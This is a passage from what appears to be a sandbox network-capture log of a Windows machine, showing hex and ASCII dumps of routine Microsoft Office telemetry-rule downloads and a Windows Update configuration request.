                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                2024-11-23 15:53:59 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                16192.168.2.4498184.175.87.197443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:01 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=t+fsTBSdmLwTfcf&MD=sOX2zuT8 HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                2024-11-23 15:54:01 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                MS-CorrelationId: 0d28c861-1dd2-40e3-a98b-391ff6413bf6
                                                                                                                                                                                                MS-RequestId: 6feeb030-7e35-4230-a954-a4d2c854104e
                                                                                                                                                                                                MS-CV: rBSA2Ejmc0q08gWK.0
                                                                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:00 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 30005
                                                                                                                                                                                                2024-11-23 15:54:01 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                2024-11-23 15:54:02 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                17192.168.2.44981913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:01 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                x-ms-request-id: 44ae66ae-301e-001f-7627-3caa3a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155401Z-15b8b599d885v8r9hC1TEB104g000000036g00000000931q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:01 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                18192.168.2.44982113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:01 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 450
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                x-ms-request-id: 3ae325a6-f01e-001f-6051-3c5dc8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155401Z-15b8b599d88z9sc7hC1TEBkr4w00000003a000000000706s
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:02 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                19192.168.2.44982213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:01 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155401Z-178bfbc474b9fdhphC1NYCac0n00000004pg000000003vxu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:02 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                20192.168.2.44982313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:01 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155401Z-178bfbc474b9xljthC1NYCtw9400000004hg00000000cp2f
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
